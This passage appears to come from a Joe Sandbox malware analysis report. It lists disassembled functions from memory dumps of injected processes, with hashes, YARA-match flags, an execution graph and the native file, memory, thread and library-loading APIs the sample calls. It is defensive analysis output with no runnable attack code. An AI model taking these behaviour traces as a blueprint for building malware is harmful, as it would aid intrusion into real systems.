                            • RTL: Resource at %p, xrefs: 23BA72A3
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 32d4126b3cbb3e46d2d0f12cbebb1ceb8c639d0c25d677b6c5aee19be6f323fa
                            • Instruction ID: 53552ce356bb8c28f0d77301379e43587c3602655a2a0c5a5bead77849ca1ba5
                            • Opcode Fuzzy Hash: 32d4126b3cbb3e46d2d0f12cbebb1ceb8c639d0c25d677b6c5aee19be6f323fa
                            • Instruction Fuzzy Hash: C1410131A08706ABC720DE69CC52F5AB7B5FB99310F1406B9F994DB641DB30E812CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 7c424358abf6efe86bdbdb22237bf25dedd0a43ad77f5c29267a4a302eed6627
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: 2B91D772E002499FDB10EF69C982ABEB7B5EF44320F1845BAE974EB6E1D73089418754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 23B39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000F.00000002.2503065074.0000000023B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 23B00000, based on PE: true
                            • Associated: 0000000F.00000002.2503065074.0000000023C29000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 0000000F.00000002.2503065074.0000000023C9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_15_2_23b00000_wab.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 83676ea44ba39cdecd05d57d31ccdf5b8cae58a6c9898a1a44b512d6b20a99f8
                            • Instruction ID: 017190adbb4b48e97d4e02caae16ea30ab8d40b04e640e08d209a17b41b7e7e8
                            • Opcode Fuzzy Hash: 83676ea44ba39cdecd05d57d31ccdf5b8cae58a6c9898a1a44b512d6b20a99f8
                            • Instruction Fuzzy Hash: 3B812972D112699BDB21DF54CC44BEEB7B8AF08750F0041EAAA19B7290D7709E84CFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:1.7%
                            Dynamic/Decrypted Code Coverage:5.9%
                            Signature Coverage:1%
                            Total number of Nodes:303
                            Total number of Limit Nodes:46
                            execution_graph 76184 4c62b60 LdrInitializeThunk 75845 9c9390 75847 9c96fc 75845->75847 75846 9c9b51 75847->75846 75849 9e93a0 75847->75849 75850 9e93c6 75849->75850 75855 9c3d20 75850->75855 75852 9e93d2 75854 9e9403 75852->75854 75858 9e3f40 75852->75858 75854->75846 75862 9d2b90 75855->75862 75857 9c3d2d 75857->75852 75859 9e3f9a 75858->75859 75861 9e3fa7 75859->75861 75886 9d1050 75859->75886 75861->75854 75863 9d2ba7 75862->75863 75865 9d2bbd 75863->75865 75866 9e8270 75863->75866 75865->75857 75868 9e8288 75866->75868 75867 9e82ac 75867->75865 75868->75867 75873 9e6f60 75868->75873 75874 9e6f7d 75873->75874 75880 4c62c0a 75874->75880 75875 9e6fa6 75877 9e9710 75875->75877 75883 9e7bc0 75877->75883 75879 9e8317 75879->75865 75881 4c62c11 75880->75881 75882 4c62c1f LdrInitializeThunk 75880->75882 75881->75875 75882->75875 75884 9e7bdd 75883->75884 75885 9e7beb RtlFreeHeap 75884->75885 75885->75879 75887 9d108b 75886->75887 75902 9d72b0 75887->75902 75889 9d1093 75901 9d134f 75889->75901 75913 9e97f0 75889->75913 75891 9d10a9 75892 9e97f0 RtlAllocateHeap 75891->75892 75893 9d10ba 75892->75893 75894 9e97f0 RtlAllocateHeap 75893->75894 75896 9d10cb 75894->75896 75897 9d115b 75896->75897 75927 9d60e0 NtClose LdrInitializeThunk LdrInitializeThunk 75896->75927 75916 9d3e60 75897->75916 75899 9d1315 75923 9e6660 75899->75923 75901->75861 75903 9d72dc 75902->75903 75928 9d71a0 75903->75928 75906 9d7321 75909 9d733d 75906->75909 75911 9e7890 NtClose 75906->75911 75907 9d7309 75908 9d7314 75907->75908 75934 9e7890 75907->75934 75908->75889 75909->75889 75912 9d7333 75911->75912 75912->75889 75942 9e7b80 75913->75942 75915 9e980b 75915->75891 75917 9d3e84 75916->75917 75918 9d3e8b 75917->75918 75919 9d3eaa 75917->75919 75945 9eabd0 LdrLoadDll 75917->75945 75918->75899 75921 9d3ed7 75919->75921 75922 9d3ec0 LdrLoadDll 75919->75922 75921->75899 75922->75921 75924 9e66ba 75923->75924 75926 9e66c7 75924->75926 75946 9d1360 75924->75946 75926->75901 75927->75897 75929 9d71ba 75928->75929 75933 9d7296 75928->75933 75937 9e7000 75929->75937 75932 9e7890 NtClose 75932->75933 75933->75906 75933->75907 75935 9e78aa 75934->75935 75936 9e78b8 NtClose 75935->75936 75936->75908 75938 9e701d 75937->75938 75941 4c635c0 LdrInitializeThunk 75938->75941 75939 9d728a 75939->75932 75941->75939 75943 9e7b9a 75942->75943 75944 9e7ba8 RtlAllocateHeap 75943->75944 75944->75915 75945->75919 75965 9d7580 75946->75965 75948 9d1865 75948->75926 75949 9d1380 75949->75948 75969 9e0100 75949->75969 75952 9d1581 75977 9ea920 75952->75977 75953 9d13de 75953->75948 75972 9ea7f0 75953->75972 75956 9d1596 75958 9d16e5 75956->75958 75960 9d15c1 75956->75960 75983 9e3fc0 75956->75983 75987 9d0010 75958->75987 75960->75948 75961 9e3fc0 2 API calls 75960->75961 75962 9d0010 LdrInitializeThunk 75960->75962 75991 9d7520 75960->75991 75961->75960 75962->75960 75963 9d16ef 75963->75960 75964 9d7520 LdrInitializeThunk 75963->75964 75964->75963 75966 9d758d 75965->75966 75967 9d75ae SetErrorMode 75966->75967 75968 9d75b5 75966->75968 75967->75968 75968->75949 75995 9e9680 75969->75995 75971 9e0121 75971->75953 75973 9ea806 75972->75973 75974 9ea800 75972->75974 75975 9e97f0 RtlAllocateHeap 75973->75975 75974->75952 75976 9ea82c 75975->75976 75976->75952 75978 9ea890 75977->75978 75979 9ea8ed 75978->75979 75980 9e97f0 RtlAllocateHeap 75978->75980 75979->75956 75981 9ea8ca 75980->75981 75982 9e9710 RtlFreeHeap 75981->75982 75982->75979 75984 9e401a 75983->75984 75986 9e403b 75984->75986 76002 9d5200 75984->76002 75986->75956 75988 9d002c 75987->75988 76014 9e7af0 75988->76014 75992 9d7533 75991->75992 76019 9e6e70 75992->76019 75994 9d755e 75994->75960 75998 9e79e0 75995->75998 75997 9e96b1 75997->75971 75999 9e7a67 75998->75999 76001 9e7a04 75998->76001 76000 9e7a7a NtAllocateVirtualMemory 75999->76000 76000->75997 76001->75997 76003 9d51aa 76002->76003 76004 9e6f60 LdrInitializeThunk 76003->76004 76005 9d51d6 76004->76005 76008 9e7920 76005->76008 76007 9d51eb 76007->75986 76009 9e79a1 76008->76009 76011 9e7944 76008->76011 76013 4c62e80 LdrInitializeThunk 76009->76013 76010 9e79cf 76010->76007 76011->76007 76013->76010 76015 9e7b0d 76014->76015 76018 4c62c70 LdrInitializeThunk 76015->76018 76016 9d0032 76016->75963 76018->76016 76020 9e6edd 76019->76020 76022 9e6e91 76019->76022 76024 4c62dd0 LdrInitializeThunk 76020->76024 76021 9e6eff 76021->75994 76022->75994 76024->76021 76185 9c9330 76186 9c933f 76185->76186 76187 9c9380 76186->76187 76188 9c936d CreateThread 76186->76188 76025 9d0490 76026 9d04a0 76025->76026 76027 9d3e60 2 API calls 76026->76027 76028 9d04c7 76027->76028 76029 9d0513 76028->76029 76030 9d0500 PostThreadMessageW 76028->76030 76030->76029 76031 9d5a90 76032 9d5ab5 76031->76032 76035 9e7250 76032->76035 76036 9e726a 76035->76036 76039 4c62c60 LdrInitializeThunk 76036->76039 76037 9d5b29 76039->76037 76040 9da590 76042 9da5b6 76040->76042 76041 9da7d5 76042->76041 76043 9ea920 2 API calls 76042->76043 76044 9da648 76043->76044 76044->76041 76045 9da719 76044->76045 76046 9e6f60 LdrInitializeThunk 76044->76046 76047 9d5090 LdrInitializeThunk 76045->76047 76049 9da738 76045->76049 76048 9da6a4 76046->76048 76047->76049 76048->76045 76052 9da6ad 76048->76052 76064 9da7bd 76049->76064 76065 9e6b30 76049->76065 76050 9da701 76051 9d7520 LdrInitializeThunk 76050->76051 76056 9da70f 76051->76056 76052->76041 76052->76050 76053 9da6df 76052->76053 76080 9d5090 76052->76080 76084 9e3140 LdrInitializeThunk 76053->76084 76057 9d7520 LdrInitializeThunk 76060 9da7cb 76057->76060 76059 9da794 76070 9e6bd0 76059->76070 76062 9da7ae 76075 9e6d10 76062->76075 76064->76057 76066 9e6b9f 76065->76066 76067 9e6b54 76065->76067 76085 4c639b0 LdrInitializeThunk 76066->76085 76067->76059 76068 9e6bc1 76068->76059 76071 9e6c3f 76070->76071 76072 9e6bf4 76070->76072 76086 4c64340 LdrInitializeThunk 76071->76086 76072->76062 76073 9e6c61 76073->76062 76076 9e6d7f 76075->76076 76077 9e6d34 76075->76077 76087 4c62fb0 LdrInitializeThunk 76076->76087 76077->76064 76078 9e6da1 76078->76064 76081 9d50a3 76080->76081 76088 9e7120 76081->76088 76083 9d50ce 76083->76053 76084->76050 76085->76068 76086->76073 76087->76078 76089 9e7144 76088->76089 76090 9e71bf 76088->76090 76089->76083 76093 4c62d10 LdrInitializeThunk 76090->76093 76091 9e7201 76091->76083 76093->76091 76094 9d5110 76095 9d7520 LdrInitializeThunk 76094->76095 76096 9d5140 76095->76096 76098 9d516c 76096->76098 76099 9d74a0 76096->76099 76100 9d74e4 76099->76100 76101 9d7505 76100->76101 76106 9e6c70 76100->76106 76101->76096 76103 9d74f5 76104 9d7511 76103->76104 76105 9e7890 NtClose 76103->76105 76104->76096 76105->76101 76107 9e6cdc 76106->76107 76109 9e6c91 76106->76109 76111 4c64650 LdrInitializeThunk 76107->76111 76108 9e6cfe 76108->76103 76109->76103 76111->76108 76189 9d6430 76190 9d645a 76189->76190 76193 9d7350 76190->76193 76192 9d6484 76194 9d736d 76193->76194 76200 9e7050 76194->76200 76196 9d73bd 76197 9d73c4 76196->76197 76198 9e7120 LdrInitializeThunk 76196->76198 76197->76192 76199 9d73ed 76198->76199 76199->76192 76201 9e70da 76200->76201 76203 9e7071 76200->76203 76205 4c62f30 LdrInitializeThunk 76201->76205 76202 9e7110 76202->76196 76203->76196 76205->76202 76117 9e6f10 76118 9e6f2d 76117->76118 76121 4c62df0 LdrInitializeThunk 76118->76121 76119 9e6f52 76121->76119 76122 9ea850 76123 9e9710 RtlFreeHeap 76122->76123 76124 9ea865 76123->76124 76206 9e6db0 76207 9e6dd4 76206->76207 76208 9e6e31 76206->76208 76211 4c62ee0 LdrInitializeThunk 76208->76211 76209 9e6e5f 76211->76209 76217 9e0730 76218 9e074c 76217->76218 76219 9e0788 76218->76219 76220 9e0774 76218->76220 76221 9e7890 NtClose 76219->76221 76222 9e7890 NtClose 76220->76222 76224 9e0791 76221->76224 76223 9e077d 76222->76223 76227 9e9830 RtlAllocateHeap 76224->76227 76226 9e079c 76227->76226 76125 9d2a8c 76126 9d71a0 2 API calls 76125->76126 76127 9d2a9c 76126->76127 76128 9d2ab1 76127->76128 76129 9e7890 NtClose 76127->76129 76129->76128 76130 9d2107 76133 9d5980 76130->76133 76132 9d2133 76134 9d59b3 76133->76134 76135 9d59d7 76134->76135 76140 9e7430 76134->76140 76135->76132 76137 9d59fa 76137->76135 76138 9e7890 NtClose 76137->76138 76139 9d5a7c 76138->76139 76139->76132 76141 9e744a 76140->76141 76144 4c62ca0 LdrInitializeThunk 76141->76144 76142 9e7473 76142->76137 76144->76142 76145 9e75c0 76146 9e7669 76145->76146 76148 9e75e8 76145->76148 76147 9e767c NtCreateFile 76146->76147 76149 9e0ac0 76150 9e0acf 76149->76150 76151 9e0b13 76150->76151 76154 9e0b51 76150->76154 76156 9e0b56 76150->76156 76152 9e9710 RtlFreeHeap 76151->76152 76153 9e0b23 76152->76153 76155 9e9710 RtlFreeHeap 76154->76155 76155->76156 76157 9e4900 76158 9e495a 76157->76158 76160 9e4967 76158->76160 76161 9e24a0 76158->76161 76162 9e9680 NtAllocateVirtualMemory 76161->76162 76164 9e24e1 76162->76164 76163 9e25e6 76163->76160 76164->76163 76165 9d3e60 2 API calls 76164->76165 76167 9e2527 76165->76167 76166 9e2560 Sleep 76166->76167 76167->76163 76167->76166 76168 9e02c1 76180 9e7720 76168->76180 76170 9e02e2 76171 9e0315 76170->76171 76172 9e0300 76170->76172 76174 9e7890 NtClose 76171->76174 76173 9e7890 NtClose 76172->76173 76175 9e0309 76173->76175 76177 9e031e 76174->76177 76176 9e034a 76177->76176 76178 9e9710 RtlFreeHeap 76177->76178 76179 9e033e 76178->76179 76181 9e77b6 76180->76181 76183 9e7741 76180->76183 76182 9e77c9 NtReadFile 76181->76182 76182->76170 76183->76170

                            Executed Functions

                            Function 009C9390 Relevance: 32.9, Strings: 26, Instructions: 410COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 9c9390-9c96f2 1 9c96fc-9c9703 0->1 2 9c973e-9c974e 1->2 3 9c9705-9c9719 1->3 2->2 6 9c9750-9c9761 2->6 4 9c971b-9c971f 3->4 5 9c9720-9c973c 3->5 4->5 5->1 7 9c9772-9c9779 6->7 8 9c977b-9c97a2 7->8 9 9c97a4-9c97bc 7->9 8->7 11 9c97cd-9c97d9 9->11 12 9c97ef-9c97f9 11->12 13 9c97db-9c97ed 11->13 15 9c980a-9c9816 12->15 13->11 16 9c982d-9c9836 15->16 17 9c9818-9c982b 15->17 19 9c983c-9c9843 16->19 20 9c9a45-9c9a4c 16->20 17->15 21 9c9868-9c9872 19->21 22 9c9845-9c985b 19->22 23 9c9bf9-9c9c00 20->23 24 9c9a52-9c9a5c 20->24 29 9c9883-9c988f 21->29 25 9c985d-9c9863 22->25 26 9c9866 22->26 27 9c9c27-9c9c30 23->27 28 9c9c02-9c9c25 23->28 30 9c9a6d-9c9a79 24->30 25->26 26->19 28->23 31 9c98a0-9c98b8 29->31 32 9c9891-9c989e 29->32 33 9c9a8c-9c9a96 30->33 34 9c9a7b-9c9a8a 30->34 35 9c98be-9c98cb 31->35 36 9c99db-9c99e5 31->36 32->29 38 9c9aa7-9c9ab1 33->38 34->30 40 9c98d1-9c98dd 35->40 41 9c99f6-9c9a02 36->41 42 9c9ae7-9c9aee 38->42 43 9c9ab3-9c9ac3 38->43 44 9c98df-9c9900 40->44 45 9c9902-9c990b 40->45 46 9c9a14-9c9a1a 41->46 47 9c9a04-9c9a0a 41->47 50 9c9b0f-9c9b19 42->50 51 9c9af0-9c9b0d 42->51 48 9c9ac5-9c9ad4 43->48 49 9c9ad6-9c9adf 43->49 44->40 52 9c990d-9c9925 45->52 53 9c9927-9c9931 45->53 57 9c9a1e-9c9a24 46->57 54 9c9a0c-9c9a0f 47->54 55 9c9a12 47->55 56 9c9ae5 48->56 49->56 58 9c9b2a-9c9b36 50->58 51->42 52->45 59 9c9942-9c994e 53->59 54->55 55->41 56->38 62 9c9a26-9c9a3e 57->62 63 9c9a40 57->63 64 9c9b4c call 9e93a0 58->64 65 9c9b38-9c9b4a 58->65 66 9c9965-9c9975 59->66 67 9c9950-9c9963 59->67 62->57 63->16 72 9c9b51-9c9b5b 64->72 68 9c9b1b-9c9b24 65->68 66->66 71 9c9977-9c9983 66->71 67->59 68->58 74 9c99a8-9c99b2 71->74 75 9c9985-9c99a6 71->75 73 9c9b6c-9c9b78 72->73 76 9c9b8e-9c9b95 73->76 77 9c9b7a-9c9b8c 73->77 78 9c99c3-9c99cc 74->78 75->71 80 9c9bbc-9c9bc6 76->80 81 9c9b97-9c9bba 76->81 77->73 82 9c99ce-9c99d7 78->82 83 9c99d9 78->83 85 9c9bd7-9c9be3 80->85 81->76 82->78 83->20 85->23 86 9c9be5-9c9bf7 85->86 86->85
                            Strings
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $$)$)A$8$:'Dy$>*$>*$>{$Dy$E($WG$Z,$[$`t$c_$d5$dG$f$m$o#$sI$7$9$=$>$g
                            • API String ID: 0-1036288621
                            • Opcode ID: 84c03cd0d7bc068fc0900ecb9c4e1c647b96381b6229c413adb3b7c431646d34
                            • Instruction ID: 6c3ae20926bee6536046d943546eefbb49849a5695a60b69e65665d8b49f821b
                            • Opcode Fuzzy Hash: 84c03cd0d7bc068fc0900ecb9c4e1c647b96381b6229c413adb3b7c431646d34
                            • Instruction Fuzzy Hash: DA329DB0D05268CBEB64CF45C898BDDBBB1BB85308F2081D9C14D6B285C7B95AC9CF56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E75C0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 009E76AD
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: b9abd527e90aaa0e9c0c74347a5ad172f83263dc1d92da8f1f8144a663922003
                            • Instruction ID: 8ec16331e79f4dc46ffce294aa5f3d9fa6335aae71ce15df09cde7d9dd30097f
                            • Opcode Fuzzy Hash: b9abd527e90aaa0e9c0c74347a5ad172f83263dc1d92da8f1f8144a663922003
                            • Instruction Fuzzy Hash: 1C31C0B5A00249AFCB14DF99D881EEFB7B9AF8C314F108219FD18A3340D730A951CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E7720 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 009E77F2
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 73e5de2b366e5a564657d96d0eda35c0a6b01ddf1d3552d284136a3f02d934e3
                            • Instruction ID: 7da6d25ecf030130717d2df35e5df5b4203b2770d42f1e71272d83a9122f1bbd
                            • Opcode Fuzzy Hash: 73e5de2b366e5a564657d96d0eda35c0a6b01ddf1d3552d284136a3f02d934e3
                            • Instruction Fuzzy Hash: 7B31E6B5A00209AFCB14DF99D881EEFB7B9EF8C314F108609FD18A7241D730A911CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E79E0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(009D13DE,?,009E66C7,00000000,00000004,00003000,?,?,?,?,?,009E66C7,009D13DE,009E66C7,00000000), ref: 009E7A97
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: 38ae9d79fb6ade4669b09d4cace4adc7d7bc1f3928e9ec88c2c1b37895e66666
                            • Instruction ID: 1d723ec2980e9d5450ce110a8220539a855aecee81485dfe1a6907c9d72fd2b2
                            • Opcode Fuzzy Hash: 38ae9d79fb6ade4669b09d4cace4adc7d7bc1f3928e9ec88c2c1b37895e66666
                            • Instruction Fuzzy Hash: F621FFB5A00649AFC714DF59DC81FAFB7B9EF88710F008519FD1897241D770A911CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E7890 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009E78C1
                            Memory Dump Source
                            • Source File: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_9c0000_clip.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 65d5252faa2608ae058e428c0cedcf7f8f0139f20cb8005d0f643aaf0fd4ccaa
                            • Instruction ID: eee8c33b5651216c1addc49134015533c5b1058dfe52d03162c7cec0444590c7
                            • Opcode Fuzzy Hash: 65d5252faa2608ae058e428c0cedcf7f8f0139f20cb8005d0f643aaf0fd4ccaa
                            • Instruction Fuzzy Hash: 38E08C36610204BBD220FA9ACC41FAB776DEFC9760F808419FA08A7242C671B91187F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e5434f84936df11c4d6c6a8ce550547e148fe9a54af4061b2d7861073f320c9c
                            • Instruction ID: cdfdc7493681467fe90d9478eabc90568abb6b28ac67923560d2fa33e1911077
                            • Opcode Fuzzy Hash: e5434f84936df11c4d6c6a8ce550547e148fe9a54af4061b2d7861073f320c9c
                            • Instruction Fuzzy Hash: D790027160550403F1007158451870620068BD0615F65C431A1425568D8795DA5165B2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C64650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2e4ae1e82ac108431bc6455a8e46659baf3b5b1c1f6462fe5614a9ec3ca753da
                            • Instruction ID: 1da193b9cf64760d155c9cb722ba62b12002ca5abf58e921de6509239d595aec
                            • Opcode Fuzzy Hash: 2e4ae1e82ac108431bc6455a8e46659baf3b5b1c1f6462fe5614a9ec3ca753da
                            • Instruction Fuzzy Hash: 509002A16015004361407158480840670069BE1715395C135A1555560C8618D9559279
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C64340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 4ce02954ca7f48f2928a5ae282ba9fee5e38ec3cd2472ec5662614279919e596
                            • Instruction ID: eaf1508164f201429626e5b138ab11e30169a4130f090d5b3d7b9edeb835f8d7
                            • Opcode Fuzzy Hash: 4ce02954ca7f48f2928a5ae282ba9fee5e38ec3cd2472ec5662614279919e596
                            • Instruction Fuzzy Hash: 8A90027160580013B1407158488854650069BE0715B55C031E1425554C8A14DA565371
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 56aba233af56738357272433aa63aceb62e5cf76353e317c732759f51604bd32
                            • Instruction ID: ef83c57c36edc5603f7f1b66491e1949e0e147485585662a6e6b6ebb5d202aac
                            • Opcode Fuzzy Hash: 56aba233af56738357272433aa63aceb62e5cf76353e317c732759f51604bd32
                            • Instruction Fuzzy Hash: 4A90027120140403F1007598540C64610068BE0715F55D031A6025555EC665D9916131
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04C62C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000014.00000002.2971691334.0000000004BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                            • Associated: 00000014.00000002.2971691334.0000000004D19000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000014.00000002.2971691334.0000000004D8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_20_2_4bf0000_clip.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: c9246133fa460a3ab24578f622d8bad07ecfbf3c825ba2cfd15397c90f25e19c
                            • Instruction ID: 6e3262d149312d0d95664c73f25f07d9335a40bc1de2406fc921f36fe6e610f6
                            • Opcode Fuzzy Hash: c9246133fa460a3ab24578f622d8bad07ecfbf3c825ba2cfd15397c90f25e19c
                            • Instruction Fuzzy Hash: 2290027120140843F10071584408B4610068BE0715F55C036A1125654D8615D9517531
                            Uniqueness

